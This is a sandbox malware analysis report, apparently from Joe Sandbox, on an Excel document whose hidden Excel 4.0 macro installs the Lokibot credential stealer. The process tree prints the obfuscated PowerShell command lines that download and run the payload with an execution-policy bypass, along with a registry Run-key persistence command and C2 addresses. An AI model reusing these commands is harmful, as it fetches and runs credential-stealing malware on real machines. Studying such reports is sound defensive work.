Analysis Report 6Cprm97UTl

Overview

General Information

Sample Name: 6Cprm97UTl (renamed file extension from none to xls)
Analysis ID: 336301
MD5: 29c8b5edc30eadf757b72b0a14857903
SHA1: 77d432fb96a0a453bae30107990c2c9ee0314330
SHA256: a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0

Detection

Hidden Macro 4.0 Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2292 cmdline: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1324 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • RegAsm.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
    • cmd.exe (PID: 2372 cmdline: cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2492 cmdline: powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2468 cmdline: cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2324 cmdline: powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • 12.exe (PID: 2800 cmdline: C:\Users\user\AppData\Local\Temp\12.exe MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
          • cmd.exe (PID: 2244 cmdline: 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 1664 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • ntrwe.exe (PID: 1916 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
            • RegAsm.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • ntrwe.exe (PID: 2996 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • ntrwe.exe (PID: 2292 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13d0f:$des3: 68 03 66 00 00
  • 0x18100:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x181cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
17.2.RegAsm.exe.400000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
17.2.RegAsm.exe.400000.1.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
17.2.RegAsm.exe.400000.1.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
17.2.RegAsm.exe.400000.1.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
17.2.RegAsm.exe.400000.1.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data:
  • Command: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
  • CommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
  • CommandLine|base64offset|contains: rg
  • Image: C:\Windows\System32\cmd.exe
  • NewProcessName: C:\Windows\System32\cmd.exe
  • OriginalFileName: C:\Windows\System32\cmd.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 2260
  • ProcessCommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
  • ProcessId: 2292

Signature Overview

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\Documents\12.exe | Joe Sandbox ML: detected
Source: C:\Users\user\ntrwe.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h]
Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\AppData\Local\Temp\12.exe | Code function: 4x nop then jmp 00318CF3h
Source: C:\Users\user\ntrwe.exe | Code function: 4x nop then jmp 00508CF3h
Source: C:\Users\user\ntrwe.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\ntrwe.exe | Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\ntrwe.exe | Code function: 4x nop then jmp 00408CF3h
Source: C:\Users\user\ntrwe.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 83.172.144.37:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.206.215.56:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49170
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49201
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49202
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49203
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49204
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49205
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49206
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49207
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49208
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49209
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49210
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49211
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49212
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49213
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49214
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49215
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49216
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49217
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49218
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49219
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49220
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49221
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49222
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49223
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49224
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49225
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.206.215.56:80
